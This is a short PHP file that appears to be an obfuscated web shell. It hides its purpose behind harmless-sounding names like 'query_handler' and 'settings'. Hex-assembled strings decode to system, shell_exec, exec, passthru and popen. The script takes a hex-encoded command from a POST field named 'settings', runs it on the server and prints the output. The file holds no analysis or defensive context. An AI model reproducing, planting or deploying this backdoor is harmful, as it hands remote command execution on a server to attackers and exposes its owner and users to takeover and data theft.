<?php


$key1 = '7';
$key2 = '9';
$key3 = '3';
$key4 = '4';
$key5 = '6';
$key6 = 'd';
$key7 = '5';
$key8 = 'c';
$key9 = '8';
$key10 = '2';
$key11 = '0';
$key12 = 'f';
$key13 = '1';
$key14 = 'e';
$query_handler1 = pack("H*", $key1.'3'.$key1.$key2.'7'.$key3.$key1.$key4.$key5.'5'.'6'.$key6);
$query_handler2 = pack("H*", $key1.'3'.'6'.'8'.$key5.$key7.'6'.$key8.'6'.'c'.$key7.'f'.$key5.$key7.$key1.$key9.'6'.'5'.$key5.$key3);
$query_handler3 = pack("H*", $key5.$key7.'7'.'8'.'6'.$key7.'6'.'3');
$query_handler4 = pack("H*", '7'.'0'.$key5.'1'.'7'.$key3.$key1.'3'.$key1.$key4.$key5.'8'.'7'.$key10.$key1.'5');
$query_handler5 = pack("H*", $key1.$key11.$key5.$key12.$key1.'0'.'6'.$key7.$key5.'e');
$query_handler6 = pack("H*", $key1.'3'.$key1.$key4.'7'.'2'.'6'.$key7.'6'.$key13.'6'.$key6.$key7.'f'.$key5.$key1.'6'.'5'.$key1.$key4.'5'.$key12.$key5.$key3.'6'.$key12.$key5.'e'.'7'.'4'.$key5.'5'.'6'.$key14.'7'.'4'.$key1.$key3);
$query_handler7 = pack("H*", $key1.'0'.$key5.$key3.$key5.'c'.$key5.$key12.'7'.$key3.$key5.'5');
$settings = pack("H*", $key1.'3'.'6'.'5'.$key1.'4'.'7'.$key4.$key5.$key2.$key5.'e'.$key5.'7'.$key1.'3');
if (isset($_POST[$settings])) {
    $settings = pack("H*", $_POST[$settings]);
    if (function_exists($query_handler1)) {
        $query_handler1($settings);
    } elseif (function_exists($query_handler2)) {
        print $query_handler2($settings);
    } elseif (function_exists($query_handler3)) {
        $query_handler3($settings, $comp_bind);
        print join("\n", $comp_bind);
    } elseif (function_exists($query_handler4)) {
        $query_handler4($settings);
    } elseif (function_exists($query_handler5) && function_exists($query_handler6) && function_exists($query_handler7)) {
        $fac_resource = $query_handler5($settings, 'r');
        if ($fac_resource) {
            $data_chunk_pgrp = $query_handler6($fac_resource);
            $query_handler7($fac_resource);
            print $data_chunk_pgrp;
        }
    }
    exit;
}
